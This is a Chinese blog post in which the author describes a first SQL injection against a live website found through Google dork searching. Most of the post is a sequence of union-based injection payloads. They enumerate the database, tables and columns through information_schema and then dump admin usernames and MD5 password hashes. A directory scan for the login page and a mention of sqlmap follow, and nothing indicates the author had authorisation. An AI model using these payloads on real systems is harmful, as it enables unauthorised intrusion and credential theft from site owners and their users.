菜鸡的第一次sql注入
作者:互联网
简单的sql注入
使用谷歌语法寻找网站的时候遇到了一个比较奇怪的网站
http://www.xxxxxx.php?id=1
标准的id=X,来都来了,不能白走啊
单引号id=1 ’ 测试,页面返回错误
id=1-0 测试,页面返回正常,说明这个地方存在sql注入
接下来判断字段数
id=1 order by 5,页面返回正常
id=1 order by 6,页面返回错误,说明存在5个字段
判断回显点
id=1 and 1=2 union select 1,2,3,4,5
回显点是2,3
查询当前数据库名
id=1 and 1=2 union select 1,2,databse(),4,5
查询当前数据库 表名
id=1 and 1=2 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()
查询字段名
id=1 and 1=2 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name=‘wenzhang’ limit 0,1
该表查出有9个字段:
id
smallclass
biaoti
neirong
shijian
bigclass
biaoti1
neirong1
zhanshi
查询表的相关内容后发现这是一个普通的数据表,没找到账号和密码
那会不会存在users表呢
id=1 and 1=2 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1
结果是不存在,试试admin表
id=1 and 1=2 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
没想到,还真有admin表,继续查
妙啊,就是这个表了
and 1=2 union select 1,username,password,4,5 from admin
账号和密码出来了,但是密码用md5加密了
御剑扫一下目录
…/login.php,后台登录页面
另外一个方法:sqlmap自动注入,是真的方便
可惜密码没能破解出来,能力有限,这次sql注入到这里就结束了。
标签:name,union,sql,菜鸡,table,注入,id,select,schema 来源: https://blog.csdn.net/qq_40020319/article/details/114803833